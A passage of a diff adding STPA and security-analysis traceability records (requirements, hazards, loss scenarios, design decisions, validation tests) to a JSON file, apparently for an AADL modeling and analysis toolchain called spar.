+      "id": "CC-S19",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Virtual bus library must distinguish nominal vs worst-case",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "CA-ALLOCATE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Allocate processes to processors (Layer 1)",
+      "type": "control-action"
+    },
+    {
+      "description": "\nThe instance model must faithfully represent the declared AADL\n\nstructure. Every subcomponent,\nconnection,\nmode,\nflow,\nand property\n\nin the declarative model must appear in the instance model.\n",
+      "id": "SC-3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Instance model fidelity",
+      "type": "system-constraint"
+    },
+    {
+      "description": "",
+      "id": "CTRL-ENGINEER",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "AADL Engineer",
+      "type": "controller"
+    },
+    {
+      "description": "",
+      "id": "CTRL-SYSML2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 Lowering Controller (spar-sysml2)",
+      "type": "controller"
+    },
+    {
+      "description": "Validate data type compatibility on connections — connected ports must have compatible classifiers.\n",
+      "id": "REQ-ANALYSIS-008",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "analysis",
+        "legality"
+      ],
+      "title": "Classifier type matching on connections",
+      "type": "requirement"
+    },
+    {
+      "description": "Build structural fault trees from error model annotations. Detect single-point-of-failure via minimal cut sets.\n",
+      "id": "REQ-ANALYSIS-005",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "analysis",
+        "safety",
+        "emv2"
+      ],
+      "title": "EMV2 fault tree analysis",
+      "type": "requirement"
+    },
+    {
+      "description": "\nJSON,\nSVG,\nor text output represents a different model than\n\nwhat spar computed internally (serialization/rendering bug).\n",
+      "id": "H-4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Serialized output does not match internal model",
+      "type": "hazard"
+    },
+    {
+      "description": "Tests verifying in_modes metadata survives instantiation on both ComponentInstance and ConnectionInstance.\n",
+      "id": "TEST-STPA-IN-MODES",
+      "links": [
+        {
+          "target": "STPA-REQ-008",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Modal metadata preservation tests (STPA-REQ-008)",
+      "type": "feature"
+    },
+    {
+      "description": "Before running the solver, a completeness check must verify that all components have the properties required for deployment optimization: threads must have Period and Compute_Execution_Time, processes must have Memory_Size (or component-level Code_Size + Data_Size + Stack_Size), processors must have resource capacities, buses must have Bandwidth. Missing required properties must produce error diagnostics. The solver must refuse to run until all required properties are present or the engineer explicitly acknowledges the gaps.\n",
+      "id": "SOLVER-REQ-028",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "completeness",
+        "pre-solve",
+        "stpa"
+      ],
+      "title": "Pre-solve model completeness check",
+      "type": "requirement"
+    },
+    {
+      "description": "Added in_modes: Vec<Name> to ComponentInstance and ConnectionInstance. The field is populated during instantiation from SubcomponentItem and ConnectionItem in_modes. All subcomponents are instantiated regardless of mode; modal membership is tracked as metadata for analyses to filter.\n",
+      "id": "ARCH-020",
+      "links": [
+        {
+          "target": "STPA-REQ-008",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Modal membership metadata on instance model",
+      "type": "design-decision"
+    },
+    {
+      "description": "Added validate_connection_array_indices() to Builder. After connections are instantiated, it builds a map of child name to max array dimension, then checks each connection endpoint for out-of-bounds array index references.\n",
+      "id": "ARCH-010",
+      "links": [
+        {
+          "target": "STPA-REQ-010",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Connection array index bounds validation",
+      "type": "design-decision"
+    },
+    {
+      "description": "After semantic connection tracing, any connection endpoint that does not resolve to a valid feature instance must produce a warning diagnostic with the connection name and unresolved path.\n",
+      "id": "STPA-REQ-013",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "instance",
+        "connections",
+        "stpa"
+      ],
+      "title": "Unresolved connection endpoint diagnostic",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-S22",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Solver uses default for missing property",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "UCA-3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Lowering omits CST node",
+      "type": "uca"
+    },
+    {
+      "description": "Verifies that unit names are matched case-insensitively (e.g., \"MS\", \"Ms\", \"ms\" all work).\n",
+      "id": "VAL-034",
+      "links": [
+        {
+          "target": "STPA-REQ-005",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-016",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Unit conversion case insensitivity",
+      "type": "feature"
+    },
+    {
+      "description": "Generated Lean4 proofs for scheduling properties (response time within deadline, per existing scheduling_verified.rs pattern). Generated Kani harnesses for bounded model checking (no deadline miss, port type safety). Per Verification Guide multi-track approach.\n",
+      "id": "REQ-CODEGEN-VERIFY-PROOF",
+      "links": [
+        {
+          "target": "REQ-CODEGEN-001",
+          "type": "traces-to"
+        }
+      ],
+      "status": "planned",
+      "tags": [
+        "codegen",
+        "verification",
+        "formal",
+        "v040"
+      ],
+      "title": "Formal proof generation (Lean4 + Kani)",
+      "type": "requirement"
+    },
+    {
+      "description": "direction_rules.rs validates port direction compatibility. classifier_match.rs validates data type compatibility on connections.\n",
+      "id": "COVERAGE-CH8",
+      "links": [
+        {
+          "target": "REQ-MODEL-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-008",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "AS5506 Ch.8: Features — direction and type rules",
+      "type": "requirement"
+    },
+    {
+      "description": "Enforce AADL naming rules, category restrictions, direction rules, connection rules, flow rules, binding rules, mode rules, and subcomponent rules. Target 50+ rules.\n",
+      "id": "REQ-ANALYSIS-007",
+      "links": [],
+      "status": "partial",
+      "tags": [
+        "analysis",
+        "legality"
+      ],
+      "title": "Legality rules (AS5506 naming and well-formedness)",
+      "type": "requirement"
+    },
+    {
+      "description": "Seven tests verifying the parser emits error diagnostics for unrecognized syntax. Covers: missing semicolons, unknown keywords, incomplete declarations, malformed feature groups, invalid property associations, garbage input, and unterminated string literals.\n",
+      "id": "TEST-STPA-PARSER-ERRORS",
+      "links": [
+        {
+          "target": "STPA-REQ-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Parser error diagnostic tests (STPA-REQ-001)",
+      "type": "feature"
+    },
+    {
+      "description": "Maps EMV2 fault tree analysis to STPA hazard artifacts. Composite error states to hazards, propagation paths to loss scenarios.\n",
+      "id": "FEAT-EMV2-STPA",
+      "links": [
+        {
+          "target": "REQ-ANALYSIS-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [
+        "v0.5.0",
+        "safety"
+      ],
+      "title": "EMV2 to STPA bridge",
+      "type": "feature"
+    },
+    {
+      "description": "requires_modes flag stored in ItemTree. Modal filtering utility for connectivity and scheduling analysis passes.\n",
+      "id": "FEAT-MODAL-001",
+      "links": [
+        {
+          "target": "REQ-ANALYSIS-009",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [
+        "v0.5.0",
+        "modes"
+      ],
+      "title": "Modal filtering and requires_modes",
+      "type": "feature"
+    },
+    {
+      "description": "When tracing connections through feature groups, members must be matched by name (not by index position). inverse_of must reverse direction but preserve name-based matching.\n",
+      "id": "STPA-REQ-011",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "instance",
+        "connections",
+        "stpa"
+      ],
+      "title": "Feature group member matching by name",
+      "type": "requirement"
+    },
+    {
+      "description": "The scheduling analysis must validate Compute_Execution_Time ranges: (1) min must not exceed max in a range expression, (2) worst-case execution time must not exceed the period. Violations produce error diagnostics since they indicate specification errors or guaranteed deadline misses.\n",
+      "id": "STPA-REQ-027",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "scheduling",
+        "stpa"
+      ],
+      "title": "Execution time range validation",
+      "type": "requirement"
+    },
+    {
+      "description": "The solver must produce a human-readable diff of all source changes before applying them. The diff must be presented to the engineer for review (in CLI mode, printed to stdout; in LSP mode, shown as a workspace edit). The engineer must have the option to accept or reject the changes. No source modification without explicit engineer approval.\n",
+      "id": "SOLVER-REQ-021",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "rewriter",
+        "review",
+        "stpa"
+      ],
+      "title": "Diff-reviewable rewrite output",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CA-SCHEDULE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Check thread schedulability (Layer 0)",
+      "type": "control-action"
+    },
+    {
+      "description": "Compute best/worst-case latency for end-to-end flows considering execution times and sampling delays.\n",
+      "id": "REQ-ANALYSIS-003",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "analysis",
+        "latency"
+      ],
+      "title": "Latency analysis",
+      "type": "requirement"
+    },
+    {
+      "description": "Map wRPC transports (NATS, TCP, QUIC) to AADL bus components with deployment bindings.\n",
+      "id": "REQ-TRANSFORM-004",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "transform",
+        "wrpc"
+      ],
+      "title": "wRPC transport modeling",
+      "type": "requirement"
+    },
+    {
+      "description": "Extend the parser to accept AADL v2.3 syntax additions while maintaining backward compatibility with v2.2. New constructs include updated property syntax and classifier enhancements.\n",
+      "id": "REQ-PARSER-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "parsing",
+        "as5506",
+        "v030"
+      ],
+      "title": "AADL v2.3 syntax acceptance",
+      "type": "requirement"
+    },
+    {
+      "description": "All subcomponents must be instantiated regardless of their in_modes filtering. Modal membership must be tracked as metadata on each instance, not used to exclude instances from the tree. Analyses can then filter by mode as needed.\n",
+      "id": "STPA-REQ-008",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "instance",
+        "modes",
+        "stpa"
+      ],
+      "title": "Modal subcomponent instantiation completeness",
+      "type": "requirement"
+    },
+    {
+      "description": "When threads are bound to a processor but no Context_Switch_Time or Interrupt_Overhead property is set on any thread, the scheduling analysis must emit an info diagnostic advising that WCET values may underestimate actual execution time if overhead is not already included in Compute_Execution_Time.\n",
+      "id": "STPA-REQ-030",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "scheduling",
+        "overhead",
+        "stpa"
+      ],
+      "title": "Interrupt and context-switch overhead advisory",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CC-SEC-1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Language-specific sanitization for all generated code",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nProtocol matching must use worst-case (not nominal) property values.\n\nThe virtual bus library must distinguish between nominal and\n\nworst-case bounds for latency,\nbandwidth,\nand jitter.\n",
+      "id": "SC-S4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Protocol selection must use worst-case properties",
+      "type": "system-constraint"
+    },
+    {
+      "description": "",
+      "id": "CTRL-REWRITER",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Source Rewriter (rowan CST editor)",
+      "type": "controller"
+    },
+    {
+      "description": "Response Time Analysis computes per-thread worst-case response times under fixed-priority preemptive scheduling, accounting for higher-priority interference and blocking. Reports deadline misses when WCRT exceeds Deadline property. Supports multi-processor configurations.\n",
+      "id": "REQ-RTA-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "analysis",
+        "scheduling",
+        "v030"
+      ],
+      "title": "RTA per-thread response time with deadline checking",
+      "type": "requirement"
+    },
+    {
+      "description": "Support all 8 predeclared property sets with 104 properties: Timing, Communication, Memory, Deployment, Thread, Programming, Modeling, AADL_Project.\n",
+      "id": "REQ-PROP-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "properties",
+        "as5506-ch11"
+      ],
+      "title": "Predeclared property sets",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-S11",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Safety decomposition allows inadequate containment",
+      "type": "uca"
+    },
+    {
+      "description": "Map WASI P3 async functions, streams, and futures to AADL thread components with scheduling properties.\n",
+      "id": "REQ-TRANSFORM-005",
+      "links": [],
+      "status": "planned",
+      "tags": [
+        "transform",
+        "wasi-p3"
+      ],
+      "title": "WASI P3 async mapping",
+      "type": "requirement"
+    },
+    {
+      "description": "When lowering a property association, the property expression must be validated against the declared property type. Type mismatches (e.g., string value for integer property) must produce an error diagnostic.\n",
+      "id": "STPA-REQ-006",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "properties",
+        "stpa"
+      ],
+      "title": "Property type validation during lowering",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "CA-VALIDATE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Post-solve validation",
+      "type": "control-action"
+    },
+    {
+      "description": "The infer_category heuristic in lower.rs checks for action/state usages to distinguish system vs. process categories. This is insufficient -- a part def with nested part usages typed as threads should be classified as process. The planned fix adds a post-lowering validation pass that cross-checks the inferred category against subcomponent categories and property associations. Additionally, lower_part_usage_to_subcomponent and lower_ref_usage_to_subcomponent should propagate the referenced type's category instead of hardcoding ComponentCategory::System.\n",
+      "id": "ARCH-027",
+      "links": [
+        {
+          "target": "STPA-REQ-033",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-034",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Category inference validation for SysML v2 lowering (planned)",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "UCA-SEC-3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Codegen interpolates unsanitized name into Rust source",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "UCA-SEC-6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Codegen produces WIT with type confusion",
+      "type": "uca"
+    },
+    {
+      "description": "\nThe instantiated system tree diverges from the declared AADL\n\nstructure due to incorrect expansion,\nmissing connections,\n\nor wrong property inheritance.\n",
+      "id": "H-3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Instance model does not match declarative model",
+      "type": "hazard"
+    },
+    {
+      "description": "",
+      "id": "CA-REPORT",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Report results",
+      "type": "control-action"
+    },
+    {
+      "description": "Will verify that verus_verify and lean_verify rules validate proof log content and reject empty or error-only logs. Blocked on STPA-REQ-039 implementation.\n",
+      "id": "VAL-065",
+      "links": [
+        {
+          "target": "STPA-REQ-039",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-032",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [],
+      "title": "Proof log content validation (planned)",
+      "type": "feature"
+    },
+    {
+      "description": "Verifies that UnitValue delegates type checking to its inner expression.\n",
+      "id": "VAL-013",
+      "links": [
+        {
+          "target": "STPA-REQ-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "UnitValue inner expression checking",
+      "type": "feature"
+    },
+    {
+      "description": "Tests validate size unit conversions (bits, Bytes, KByte, MByte, GByte, TByte) with factor verification (8x for bits/Bytes, 1024x for powers).\n",
+      "id": "VAL-033",
+      "links": [
+        {
+          "target": "STPA-REQ-005",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-016",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Size unit conversion pairs validated",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "UCA-S6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Allocator does not invoke Layer 0 for new assignment",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CC-15",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 lowering must emit diagnostic for unhandled constructs",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "CC-2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Lowering must handle all SyntaxKind variants",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nAn engineer misinterprets the rendered diagram — reading a wrong\n\nconnection,\nmissing a component,\nor confusing port directions —\n\nleading to a design error in the implemented system.\n",
+      "id": "L-R1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Engineer misreads architecture",
+      "type": "loss"
+    },
+    {
+      "description": "When the solver co-locates components of different safety levels (ASIL/DAL/SIL) on the same processor, it must verify that: (a) an ARINC 653 partition schedule exists, (b) health monitoring is configured with appropriate actions (partition restart, process stop), (c) time and space partitioning is specified. If any containment mechanism is missing, the co-location must be rejected with an error diagnostic identifying the missing mechanism.\n",
+      "id": "SOLVER-REQ-014",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "mixed-criticality",
+        "containment",
+        "stpa"
+      ],
+      "title": "Safety level co-location requires verified containment",
+      "type": "requirement"
+    },
+    {
+      "description": "Verifies that SystemInstance::instantiate produces a circular containment diagnostic when given a model with cycles.\n",
+      "id": "VAL-020",
+      "links": [
+        {
+          "target": "STPA-REQ-012",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Circular containment via instantiate integration",
+      "type": "feature"
+    },
+    {
+      "description": "Verifies that when two imported packages both export a classifier with the same unqualified name, resolution produces an \"ambiguous\" warning listing the candidate packages.\n",
+      "id": "VAL-016",
+      "links": [
+        {
+          "target": "STPA-REQ-007",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-006",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Ambiguous classifier reference warns",
+      "type": "feature"
+    },
+    {
+      "description": "\nCode generation must enforce limits on the number of generated\n\nfiles,\ntotal output size,\nand recursion depth during model\n\ntraversal.\n",
+      "id": "SC-SEC-6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Resource bounds on code generation",
+      "type": "system-constraint"
+    },
+    {
+      "description": "Verifies that flows on the same processor do not trigger the inter-processor communication overhead advisory.\n",
+      "id": "VAL-049",
+      "links": [
+        {
+          "target": "STPA-REQ-028",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Same-processor flow no overhead advisory",
+      "type": "feature"
+    },
+    {
+      "description": "SysML v2 → AADL lowering implementing SEI 2023 mapping specification. part def → system/process type, port def → data port, connection def → connection, constraint def → timing properties, allocate → bindings. Enables spar analysis on SysML v2-modeled systems.\n",
+      "id": "REQ-SYSML2-LOWER",
+      "links": [
+        {
+          "target": "REQ-INTEROP-001",
+          "type": "traces-to"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "sysml2",
+        "transform",
+        "v040"
+      ],
+      "title": "Lower SysML v2 to AADL per SEI mapping rules",
+      "type": "requirement"
+    },
+    {
+      "description": "The wasm_component Bazel rule must parse cargo build's --message-format=json output to extract the exact path of the produced .wasm artifact, instead of using find to locate it. The rule must verify that the .wasm file was produced by the current build invocation (via Bazel's action dependency graph, not filesystem timestamps). Content hashing of the core module should be logged for audit.\n",
+      "id": "STPA-SEC-REQ-008",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "security",
+        "build",
+        "wasm",
+        "stpa-sec"
+      ],
+      "title": "WASM component provenance verification",
+      "type": "requirement"
+    },
+    {
+      "description": "The list of errors, warnings, and info diagnostics produced",
+      "id": "CP-DIAGNOSTICS",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Analysis Diagnostics",
+      "type": "controlled-process"
+    },
+    {
+      "description": "",
+      "id": "CTRL-SEC-CODEGEN",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Code Generation Controller",
+      "type": "controller"
+    },
+    {
+      "description": "",
+      "id": "CA-SEC-GENPROOF",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generate verification artifacts",
+      "type": "control-action"
+    },
+    {
+      "description": "\nA developer adds a new analysis pass (e.g.,\nclassifier_match.rs)\n\nbut forgets to register it in the AnalysisRunner::register_all()\n\nfunction. The analysis code compiles and its unit tests pass in\n\nisolation. But when spar runs on a real model,\nthe new analysis\n\nnever executes. Connection type mismatches go undetected.\n",
+      "id": "LS-5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Analysis pass not registered after code addition",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "AADL v2.2 parser producing a lossless concrete syntax tree (CST) using rowan. Hand-written recursive descent with error recovery.\n",
+      "id": "ARCH-PARSER",
+      "links": [
+        {
+          "target": "REQ-PARSE-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-PARSE-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-PARSER-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "spar-parser",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nWhen the solver encounters a component without required properties\n\n(timing,\nmemory,\nbinding candidates),\nit must emit an error\n\ndiagnostic and exclude that component from optimization rather\n\nthan assuming a default value.\n",
+      "id": "SC-S10",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Missing model properties must produce diagnostics",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nAn AFDX network has 100 Mbps bandwidth. The solver assigns 60\n\nconnections to the network,\neach individually requiring 2 Mbps.\n\nLayer 2 checks each connection individually against the bus\n\nbandwidth (2 < 100,\npass) but does not sum the aggregate load\n\n(60 * 2 = 120 > 100,\nfail). At runtime,\nthe AFDX network is\n\noverloaded and starts dropping virtual links.\n",
+      "id": "LS-S4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Aggregate bus bandwidth exceeded",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Created crates/spar-hir-def/src/property_check.rs as a new module containing validate_property_type() and supporting types. The module validates PropertyExpr against PropertyTypeDef using recursive match. It handles all expression/type combinations including nested structures (List, Range, Record, UnitValue).\n",
+      "id": "ARCH-004",
+      "links": [
+        {
+          "target": "STPA-REQ-006",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Standalone property_check module for type validation",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nA SysML v2 model contains a `flow def` that specifies an end-to-end\n\ndata path between ports. The lower_node function matches against\n\nknown SyntaxKinds but `FLOW_DEF` is not handled -- it falls through\n\nto `_ => {}`. No AADL flow spec or end-to-end flow is created. The\n\nlowered AADL model has all the ports and connections but no flow\n\ndeclarations. Latency analysis reports \"no flows defined\" (info)\n\ninstead of computing latency bounds. The engineer believes the\n\nSysML v2 flows were carried over.\n",
+      "id": "LS-9",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 flow definition silently dropped during lowering",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "Changed Builder max_depth from 32 to 100 to support legitimately deep hierarchies (e.g., partitioned avionics systems with 4+ levels of containment). The value 100 is well within stack limits while being large enough for realistic AADL models.\n",
+      "id": "ARCH-008",
+      "links": [
+        {
+          "target": "STPA-REQ-012",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Increase max_depth from 32 to 100",
+      "type": "design-decision"
+    },
+    {
+      "description": "\nThe SysML v2 lowering uses heuristics (infer_category) to decide\n\nAADL component categories. An adversary can craft a part def that\n\nthe heuristic misclassifies (e.g.,\na security-critical process\n\nlowered as a system,\nbypassing thread-level scheduling analysis).\n\nThe wildcard `_ => {}` in lower_node silently drops unrecognized\n\nSysML v2 constructs without diagnostics.\n",
+      "id": "H-SEC-3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 lowering silently alters component semantics",
+      "type": "hazard"
+    },
+    {
+      "description": "Tests for memory budget analysis covering budget violations when Code_Size + Data_Size exceeds Memory_Size, normal budget reporting, and handling of components with partial or missing size properties.\n",
+      "id": "VAL-MEMBUD-001",
+      "links": [
+        {
+          "target": "REQ-MEMBUD-001",
+          "type": "verifies"
+        },
+        {
+          "target": "ARCH-ANALYSIS-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [],
+      "title": "Memory budget analysis tests",
+      "type": "feature"
+    },
+    {
+      "description": "When both spar analyze and spar codegen --verify are run on the same model, the timing properties used by the analysis engine must be compared with the timing constants embedded in generated proofs. Any discrepancy (e.g., analysis uses 5ms period but proof uses default 10ms) must be reported as an error. This cross-reference should be implemented as a post-codegen validation step.\n",
+      "id": "STPA-SEC-REQ-012",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "security",
+        "verification",
+        "consistency",
+        "stpa-sec"
+      ],
+      "title": "Cross-reference analysis results with proof inputs",
+      "type": "requirement"
+    },
+    {
+      "description": "Tests verifying that semantic zoom reduces clutter at overview levels by collapsing internal details and showing only component boundaries and inter-component connections.\n",
+      "id": "VAL-R5",
+      "links": [
+        {
+          "target": "RENDER-REQ-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-R4",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "Semantic zoom tests (RENDER-REQ-006)",
+      "type": "feature"
+    },
+    {
+      "description": "",
+      "id": "CTRL-SEC-PROOFGEN",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Proof Generation Controller",
+      "type": "controller"
+    },
+    {
+      "description": "",
+      "id": "UCA-SEC-2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Category heuristic misclassifies security-critical component",
+      "type": "uca"
+    },
+    {
+      "description": "24 tests serialize each spar-hir public type to JSON, deserialize back, and assert structural equality. Covers all 16 serializable types plus all enum variants.\n",
+      "id": "VAL-037",
+      "links": [
+        {
+          "target": "STPA-REQ-019",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-018",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Serde round-trip for all public types",
+      "type": "feature"
+    },
+    {
+      "description": "When a connection crosses a security zone boundary, the solver must select only protocols that provide the required security properties (encryption level, authentication mechanism, integrity check). The virtual bus library must declare security properties. Connections without a matching secure protocol must produce an error diagnostic, not be silently assigned to an insecure protocol.\n",
+      "id": "SOLVER-REQ-010",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "bus-binding",
+        "security",
+        "stpa"
+      ],
+      "title": "Security zone enforcement for protocol selection",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-8",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Connection tracing produces wrong endpoint",
+      "type": "uca"
+    },
+    {
+      "description": "\nInteractive output must support selecting a component or\n\nconnection and highlighting its connected neighbors,\nports,\n\nand edges to isolate subsystems for focused review.\n",
+      "id": "RENDER-REQ-005",
+      "links": [],
+      "status": "implemented",
+      "tags": [],
+      "title": "Selection and group highlighting",
+      "type": "safety-requirement"
+    },
+    {
+      "description": "All 22 analysis modules have a severity rationale comment block at the top of their analyze() function documenting Error/Warning/Info criteria.\n",
+      "id": "ARCH-022",
+      "links": [
+        {
+          "target": "STPA-REQ-016",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Severity rationale comments in all analysis modules",
+      "type": "design-decision"
+    },
+    {
+      "description": "When global validation (SOLVER-REQ-015) detects a constraint violation, the solver must support backtracking to revise earlier layer decisions. At minimum, the solver must report which layer's decision caused the violation and suggest a relaxation (e.g., \"E2E latency violated: consider fewer bus hops by co-locating processes X and Y\"). Full automated backtracking is desirable but manual-with-guidance is acceptable for the initial implementation.\n",
+      "id": "SOLVER-REQ-016",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "backtracking",
+        "global-validation",
+        "stpa"
+      ],
+      "title": "Layer backtracking on global constraint violation",
+      "type": "requirement"
+    },
+    {
+      "description": "\nGenerated Cargo.toml and BUILD.bazel must use exact version pins,\n\nchecksum verification,\nor workspace-local paths. No generated file\n\nmay reference unpinned external registries.\n",
+      "id": "SC-SEC-5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generated build configurations must use pinned dependencies",
+      "type": "system-constraint"
+    },
+    {
+      "description": "33+ analysis passes implementing connectivity, scheduling, latency, resource budget, EMV2, ARINC 653, legality rules, mode reachability, AI/ML safety (ISO/PAS 8800), and more. Trait-based Analysis framework with AnalysisRunner.\n",
+      "id": "ARCH-ANALYSIS",
+      "links": [
+        {
+          "target": "REQ-ANALYSIS-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-004",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-005",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-007",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-008",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-009",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-SOLVER-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH4",
